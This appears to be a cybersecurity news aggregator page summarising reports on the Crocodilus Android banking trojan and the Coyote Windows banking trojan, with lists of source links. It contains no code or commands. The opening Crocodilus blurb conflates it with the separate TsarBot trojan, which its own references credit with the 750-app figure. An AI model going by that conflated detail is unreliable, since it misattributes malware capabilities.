CyberSecurity news

FlagThis - #bankingtrojan

rohansinhacyblecom@cyble.com //

New Android Banking Trojan Crocodilus Steals Credentials - Crocodilus, a novel Android banking trojan, targets over 750 applications, including banking, finance, cryptocurrency, and e-commerce apps globally spreading via phishing sites masquerading as Google Chrome.
A new Android banking trojan called Crocodilus has been discovered, targeting users in Spain and Turkey. Cybersecurity experts warn that this sophisticated malware employs advanced techniques like remote control, black screen overlays, and data harvesting through accessibility logging. Crocodilus is designed to facilitate device takeover and conduct fraudulent transactions, masquerading as Google Chrome to bypass Android 13+ restrictions.

Once installed, Crocodilus requests access to Android's accessibility services and connects to a remote server for instructions and a list of targeted financial applications. The malware steals banking and crypto credentials by displaying HTML overlays and monitors all accessibility events to capture screen contents, including Google Authenticator details. Crocodilus conceals malicious activities using a black screen overlay and muting sounds to avoid detection.

Recommended read:
References :
  • cyble.com: TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications
  • thehackernews.com: New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials
  • gbhackers.com: “Crocodilusâ€� A New Malware Targeting Android Devices for Full Takeover
  • securityaffairs.com: The new Android trojan Crocodilus exploits accessibility features to steal banking and crypto credentials, mainly targeting users in Spain and Turkey.
  • ciso2ciso.com: Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that’s primarily designed to target users in Spain and Turkey.
  • BleepingComputer: A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access.
  • The DefendOps Diaries: Discover how Crocodilus malware exploits Android devices, threatening cryptocurrency security with advanced RAT capabilities and social engineering.
  • cointelegraph.com: Android malware ‘Crocodilus’ can take over phones to steal crypto
  • Talkback Resources: TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications
  • www.scworld.com: Advanced Crocodilus Android trojan emerges Widely known cryptocurrency wallets, as well as banks in Spain and Turkey, have already been targeted in attacks involving the novel sophisticated Crocodilus Android trojan, which combines bot and remote access trojan capabilities to facilitate banking and cryptocurrency credential compromise, according to Security Affairs.
  • Metacurity: The new Android trojan Crocodilus exploits accessibility features to steal banking and crypto credentials, mainly targeting users in Spain and Turkey.
  • Blog: New Crocodilus malware snaps up crypto wallets
  • thecyberexpress.com: Cyble researchers have discovered a new Android banking trojan that uses overlay attacks and other techniques to target more than 750 applications, including banking, finance, cryptocurrency, payment, social media, and e-commerce applications.
  • securityonline.info: Android Under Attack: Crocodilus Trojan Captures OTPs from Google Authenticator
  • www.cysecurity.news: New Android Banking Trojan 'Crocodilus' Emerges as Sophisticated Threat in Spain and Turkey
rohansinhacyblecom@cyble.com //

Crocodilus Malware Steals Android Crypto Wallet Keys - Crocodilus, a new Android malware, targets cryptocurrency users in Spain and Turkey, stealing banking and crypto credentials using accessibility features and remote control.
A new Android malware named Crocodilus has been discovered targeting cryptocurrency users, primarily in Spain and Turkey. Cybersecurity researchers have found that Crocodilus employs sophisticated techniques, including remote control capabilities, black screen overlays, and advanced data harvesting through accessibility logging. The malware is designed to steal banking and cryptocurrency credentials, posing a significant threat to Android users in these regions.

Crocodilus tricks users into divulging their cryptocurrency wallet seed phrases by displaying a fake warning urging them to back up their keys to avoid losing access. It also exploits accessibility features to monitor app launches, display overlays to intercept credentials, and capture screen contents, including Google Authenticator OTP codes. This allows attackers to gain full control of wallets and drain assets. The malware also features call and SMS control, device admin and persistence, social engineering, and remote commands and settings update capabilities.

ThreatFabric researchers note that Crocodilus exhibits a high level of maturity for a newly discovered threat, demonstrating advanced device takeover capabilities. The malware is distributed via a proprietary dropper that bypasses Android 13 security protections and installs the malware without triggering Play Protect. Analysis of the source code suggests that the malware author is Turkish-speaking.

Recommended read:
References :
  • BleepingComputer: A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access.
  • securityaffairs.com: Experts warn of the new sophisticate Crocodilus mobile banking Trojan
  • thehackernews.com: Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey.
  • BleepingComputer: A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access.
  • www.scworld.com: Advanced Crocodilus Android trojan emerges Widely known cryptocurrency wallets, as well as banks in Spain and Turkey, have already been targeted in attacks involving the novel sophisticated Crocodilus Android trojan, which combines bot and remote access trojan capabilities to facilitate banking and cryptocurrency credential compromise, according to Security Affairs.
  • Blog: New Crocodilus malware snaps up crypto wallets
  • The420.in: Crypto Under Attack: Crocodilus Malware Targets Android Users
  • securityonline.info: Android Under Attack: Crocodilus Trojan Captures OTPs from Google Authenticator
  • www.cysecurity.news: New Android Banking Trojan 'Crocodilus' Emerges as Sophisticated Threat in Spain and Turkey
@securityonline.info //

Coyote Malware Expands Reach Targeting Windows Systems - The Coyote Banking Trojan targets Microsoft Windows users, distributed via malicious LNK files executing PowerShell commands to harvest sensitive information and bypass sandbox discovery, now targeting 1,030 sites and 73 financial institutions.
Fortinet's FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan. This sophisticated malware, targeting Microsoft Windows users, has expanded its reach to include 1,030 websites and 73 financial institutions. The malware is distributed through malicious LNK files that execute PowerShell commands, initiating a multi-stage attack. The primary goal is to harvest sensitive data, including system details and lists of installed antivirus products.

The attack sequence begins with a LNK file executing a PowerShell command to retrieve a next-stage PowerShell script, launching the trojan. Once deployed, the trojan gathers system information and evades detection by security measures. Should a victim attempt to access a targeted site, the malware communicates with a command-and-control server, enabling actions like capturing screenshots or displaying phishing overlays to steal sensitive credentials, impacting financial cybersecurity.

Recommended read:
References :
  • gbhackers.com: FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan, a sophisticated malware targeting Microsoft Windows users.
  • www.scworld.com: Updated Coyote malware facilitates more extensive compromise
  • gbhackers.com: Coyote Malware Launches Stealthy Attack on Windows Systems via LNK Files
  • The Hacker News: Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
  • securityonline.info: SecurityOnline article about the multi-stage Coyote banking trojan targeting Brazil.
  • securityaffairs.com: Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil
@securityonline.info //

Coyote Trojan Targets Brazilian Financial Application Users - The Coyote Banking Trojan targets Brazilian users by stealing data from over 70 financial applications and websites using malicious LNK files and PowerShell scripts.
The Coyote Banking Trojan is actively targeting financial institutions and online banking users in Brazil, stealing data from over 70 financial applications and websites. Cybersecurity researchers at FortiGuard Labs have uncovered this stealthy and highly sophisticated banking trojan which leverages malicious LNK files and PowerShell scripts to infiltrate Windows systems, deploy payloads, and steal sensitive banking credentials. The attack begins with a weaponized LNK file that executes a hidden PowerShell command, connecting to a remote server and downloading additional malicious scripts, initiating the next stage of the attack.

The Trojan can keylog user activity, capture screenshots, display phishing overlays, and even manipulate browser windows to steal financial data. It collects system information such as the machine ID, MAC address, Windows version, and installed security software, sending these details to remote command-and-control servers. The final payload includes the main Coyote Banking Trojan, which expands its target list to over 1,000 websites and 73 financial agents. Accessing any of the targeted sites could trigger further malicious activity, enhancing the threat to financial cybersecurity.

Recommended read:
References :
  • gbhackers.com: Coyote Malware Launches Stealthy Attack on Windows Systems via LNK Files
  • securityaffairs.com: Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil

Posts

Blogs

Research Tools